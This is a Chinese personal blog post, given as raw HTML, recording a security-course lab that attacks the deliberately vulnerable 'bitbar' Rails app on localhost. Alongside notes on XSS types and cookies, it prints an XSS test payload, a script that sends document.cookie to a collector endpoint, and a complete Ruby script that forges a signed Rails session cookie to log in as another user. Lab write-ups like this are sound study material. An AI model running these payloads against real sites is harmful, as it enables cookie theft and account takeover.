<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="Carrie">


    <meta name="subtitle" content="再相逢，希望我们都在更高处。">


    <meta name="description" content="菜鸡的自我修养">


    <meta name="keywords" content="C，Python，逆向，恶意代码，网络安全">


<title>网安实验攻击bitbar网站 | Carrie&#39;s Blog</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 4.2.0"></head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Carrie&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Carrie&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">网安实验攻击bitbar网站</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">Carrie</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">五月 14, 2020&nbsp;&nbsp;20:24:46</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/web%E5%89%8D%E7%AB%AF/">web前端</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h1 id="安装Ruby-on-Rails"><a href="#安装Ruby-on-Rails" class="headerlink" title="安装Ruby on Rails"></a>安装Ruby on Rails</h1><p>Ruby on Rails 是一个用于开发以数据库为后台的 web 应用程序的开源 web 框架。其为发挥程序员持久的生产力而优化，因为它能让程序员通过有益的约定而不是配置来编写代码。 </p>
<p>实验环境：ubuntu 16.04 ,ruby 2.5.8 ,rail 5.0.7.2</p>
<p><a href="http://gorails.com/setup/ubuntu/16.04" target="_blank" rel="noopener">http://gorails.com/setup/ubuntu/16.04</a></p>
<p>安装rail时出现了一个问题：</p>
<p>输入 gem install rails -v 5.0.7.2</p>
<p>报错</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Fetching: nokogiri-1.10.9.gem (  0%)ERROR:  While executing gem ... (Gem::RemoteFetcher::FetchError)</span><br><span class="line">    too many connection resets (https://api.rubygems.org/gems/nokogiri-1.10.9.gem)</span><br></pre></td></tr></table></figure>

<p><a href="https://blog.csdn.net/xiaocy66/article/details/83902319" target="_blank" rel="noopener">解决 gem 添加sources的时候提示 too many connection resets的问题</a></p>
<p>用gem sources -l 查看当前源是<a href="https://rubygems.org/,解决方法是换源" target="_blank" rel="noopener">https://rubygems.org/,解决方法是换源</a> gem sources –add <a href="https://gems.ruby-china.com/" target="_blank" rel="noopener">https://gems.ruby-china.com/</a> –remove <a href="https://rubygems.org/" target="_blank" rel="noopener">https://rubygems.org/</a> </p>
<h1 id="XSS漏洞"><a href="#XSS漏洞" class="headerlink" title="XSS漏洞"></a>XSS漏洞</h1><h3 id="反射型：经过后端，不经过数据库"><a href="#反射型：经过后端，不经过数据库" class="headerlink" title="反射型：经过后端，不经过数据库"></a>反射型：经过后端，不经过数据库</h3><h3 id="存储型：经过后端，经过数据库"><a href="#存储型：经过后端，经过数据库" class="headerlink" title="存储型：经过后端，经过数据库"></a>存储型：经过后端，经过数据库</h3><h3 id="DOM：不经过后端-DOM-xss是通过url传入参数去控制触发的。"><a href="#DOM：不经过后端-DOM-xss是通过url传入参数去控制触发的。" class="headerlink" title="DOM：不经过后端,DOM- xss是通过url传入参数去控制触发的。"></a>DOM：不经过后端,DOM- xss是通过url传入参数去控制触发的。</h3><p>参考链接：</p>
<p><a href="https://blog.csdn.net/qw_xingzhe/article/details/80712840" target="_blank" rel="noopener">https://blog.csdn.net/qw_xingzhe/article/details/80712840</a></p>
<p><a href="https://www.jianshu.com/p/790fb57f3acb" target="_blank" rel="noopener">xss漏洞攻击与防御</a></p>
<h1 id="COOKIE？"><a href="#COOKIE？" class="headerlink" title="COOKIE？"></a>COOKIE？</h1><p><strong>HTTP天然是无状态的协议,</strong> 为了维持和跟踪用户的状态, 引入了Cookie和Session. Cookie包含了浏览器客户端的用户凭证, 相对较小. Session则维护在服务器, 用于维护相对较大的用户信息.</p>
<p>　　用通俗的语言, <strong>Cookie是钥匙, Session是锁芯.</strong></p>
<p><a href="https://blog.csdn.net/zhangquan_zone/article/details/77627899?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase" target="_blank" rel="noopener">好好了解一下Cookie(强烈推荐)</a></p>
<p><a href="https://www.cnblogs.com/doit8791/p/5926575.html" target="_blank" rel="noopener">https://www.cnblogs.com/doit8791/p/5926575.html</a></p>
<h2 id="response-cookie和request-cookie的区别"><a href="#response-cookie和request-cookie的区别" class="headerlink" title="response.cookie和request.cookie的区别"></a><a href="https://www.cnblogs.com/try-chi/p/11995231.html" target="_blank" rel="noopener">response.cookie和request.cookie的区别</a></h2><p> Request.Cookies创建的Cookie只有?Request.Cookies才能获取到，而其他两种方法是不能获取的，也就是说<br>Request.Cookies创建的Cookie只能用于.Net后台不能用于HTML的前台。</p>
<p>Response.Cookies：主要用于Cookie的创建、赋值和删除操作，经过?Response.Cookies操作过的Cookie，所有方法获取到的都是被更新过的值，也就是说Response.Cookies是修改所有容器中的Cookie的值；Response.Cookies除了是Cookie的终极修改者外，</p>
<p>我们在写代码的时候可能会发现通过Response.Cookies也可以得到部分Cookie的值，通过实验发现，此处获取的Cookie值只是本次会话中且是通过Response.Cookies创建的Cookie，基本上没什么用处。 </p>
<h1 id="attack1-：-cookie-theft"><a href="#attack1-：-cookie-theft" class="headerlink" title="attack1 ： cookie theft"></a>attack1 ： cookie theft</h1><p>这里解释的比较清楚，从<a href="https://www.techopedia.com/definition/24633/cookie-theft摘下来。" target="_blank" rel="noopener">https://www.techopedia.com/definition/24633/cookie-theft摘下来。</a></p>
<p> By mimicking a person’s cookie over the same network, a hacker can access sites and perform malicious actions. Depending on the sites accessed while the hacker is monitoring the network, this could be anything from <strong>making false posts in that individual’s name</strong> to <strong>transferring money out of a bank account.</strong> Hacking software has made it easier for hackers to carry out these attacks by monitoring the packets going back and forth. <strong><em>Cookie theft can be avoided by only logging in over SSL connections or employing HTTPS protocol to encrypt the connection. Otherwise, it is best not to access sites over unsecured networks.</em></strong> </p>
<p>漏洞原理：XSS反射性漏洞</p>
<p>1.验证有xss漏洞的脚本</p>
<script>alert(/xss/)</script>

<p>提交后执行弹窗“/xss/”</p>
<p>2.实现窃取cookie的脚本</p>
  <script type="text/javascript">(new Image()).src="http://localhost:3000/steal_cookie?cookie="+document.cookie</script>  

<p>然后访问<a href="http://localhost:3000/view_stolen_cookie" target="_blank" rel="noopener">http://localhost:3000/view_stolen_cookie</a>  ，得到cookie</p>
<h1 id="attack2：Session-hijacking-with-Cookies"><a href="#attack2：Session-hijacking-with-Cookies" class="headerlink" title="attack2：Session hijacking with Cookies"></a>attack2：Session hijacking with Cookies</h1><p>用别人的cookie，提交请求，冒充别人。</p>
<p>首先了解cookie的生成逻辑，然后逆向解释出attacker的cookie所代表的的含义，从最原始的信息里修改为user1有关的cookie，再正向拼接初始向量iv的base64编码，最终形成cookie，替换掉原来的cookie值，提交表单，得到服务器的响应。</p>
<h3 id="Ruby：Mechanize的使用教程"><a href="#Ruby：Mechanize的使用教程" class="headerlink" title="Ruby：Mechanize的使用教程"></a><a href="https://www.cnblogs.com/hongfei/p/3699029.html" target="_blank" rel="noopener">Ruby：Mechanize的使用教程</a></h3><h3 id="Rails-Cookie-如何解密"><a href="#Rails-Cookie-如何解密" class="headerlink" title="Rails Cookie 如何解密"></a><a href="https://ruby-china.org/topics/34235" target="_blank" rel="noopener">Rails Cookie 如何解密</a></h3><h3 id="http-prontosil-me-posts-bc703cb4"><a href="#http-prontosil-me-posts-bc703cb4" class="headerlink" title="http://prontosil.me/posts/bc703cb4/"></a><a href="http://prontosil.me/posts/bc703cb4/" target="_blank" rel="noopener">http://prontosil.me/posts/bc703cb4/</a></h3><p>最终脚本：</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'mechanize'</span></span><br><span class="line"><span class="keyword">require</span> <span class="string">'net/http'</span></span><br><span class="line">SESSION = <span class="string">'_bitbar_session'</span></span><br><span class="line">RAILS_SECRET = <span class="string">'0a5bfbbb62856b9781baa6160ecfd00b359d3ee3752384c2f47ceb45eada62f24ee1cbb6e7b0ae3095f70b0a302a2d2ba9aadf7bc686a49c8bac27464f9acb08'</span></span><br><span class="line"></span><br><span class="line">agent = Mechanize.new</span><br><span class="line">url = <span class="string">"http://localhost:3000/login"</span></span><br><span class="line"></span><br><span class="line">page = agent.get(url)</span><br><span class="line"></span><br><span class="line">form = page.forms.first</span><br><span class="line">form[<span class="string">'username'</span>] = form[<span class="string">'password'</span>] = <span class="string">'attacker'</span></span><br><span class="line">agent.submit form</span><br><span class="line"></span><br><span class="line">cookie = agent.cookie_jar.jar[<span class="string">'localhost'</span>][<span class="string">'/'</span>][SESSION].to_s.sub(<span class="string">"<span class="subst">#&#123;SESSION&#125;</span>="</span>, <span class="string">''</span>)</span><br><span class="line">cookie_value, cookie_signature = cookie.split(<span class="string">'--'</span>)</span><br><span class="line">raw_session = Base64.decode64(cookie_value)</span><br><span class="line">session = Marshal.load(raw_session)</span><br><span class="line"></span><br><span class="line">puts session</span><br><span class="line">session[<span class="string">'logged_in_id'</span>] = <span class="number">1</span></span><br><span class="line">cookie_value = Base64.encode64(Marshal.dump(session)).split.join <span class="comment"># get rid of newlines</span></span><br><span class="line">cookie_signature = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, RAILS_SECRET, cookie_value)</span><br><span class="line">cookie_full = <span class="string">"<span class="subst">#&#123;SESSION&#125;</span>=<span class="subst">#&#123;cookie_value&#125;</span>--<span class="subst">#&#123;cookie_signature&#125;</span>"</span></span><br><span class="line"></span><br><span class="line">url = URI(<span class="string">'http://localhost:3000/profile'</span>)</span><br><span class="line"></span><br><span class="line">http = Net::HTTP.new(url.host, url.port)</span><br><span class="line"></span><br><span class="line">header = &#123;<span class="string">'Cookie'</span><span class="symbol">:cookie_full</span>&#125;</span><br><span class="line">response = http.get(url,header)</span><br><span class="line">puts response.body</span><br></pre></td></tr></table></figure>







<h1 id="attack3："><a href="#attack3：" class="headerlink" title="attack3："></a>attack3：</h1><p><a href="https://www.jianshu.com/p/303206ae2471" target="_blank" rel="noopener">常见web安全攻防总结</a></p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>Carrie</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://github.com/Carrieono/Carrieono.github.io/2020/05/14/%E7%BD%91%E5%AE%89%E5%AE%9E%E9%AA%8C%E6%94%BB%E5%87%BBbitbar%E7%BD%91%E7%AB%99/">https://github.com/Carrieono/Carrieono.github.io/2020/05/14/%E7%BD%91%E5%AE%89%E5%AE%9E%E9%AA%8C%E6%94%BB%E5%87%BBbitbar%E7%BD%91%E7%AB%99/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a href="http://creativecommons.org/licenses/by-nc/4.0/" target="_blank" rel="noopener">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY</strong>?</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/web%E5%AE%89%E5%85%A8/"># web安全</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2020/05/14/%E5%85%B3%E4%BA%8EDDOS%E7%9A%84%E6%80%9D%E8%80%83/">关于DDOS的思考</a>
            
            
            <a class="next" rel="next" href="/2020/05/09/python3%E5%AD%A6%E4%B9%A0/">python3学习</a>
            
        </section>


    </article>
</div>

        </div>
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>© Carrie | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>
</html>
